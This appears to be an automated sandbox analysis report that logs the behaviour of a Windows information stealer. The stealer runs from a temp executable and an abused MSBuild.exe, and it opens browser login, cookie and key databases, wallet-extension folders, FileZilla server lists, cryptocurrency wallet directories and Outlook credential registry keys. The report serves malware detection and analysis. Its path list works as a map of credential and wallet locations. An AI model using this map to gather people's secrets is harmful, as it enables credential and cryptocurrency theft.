Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
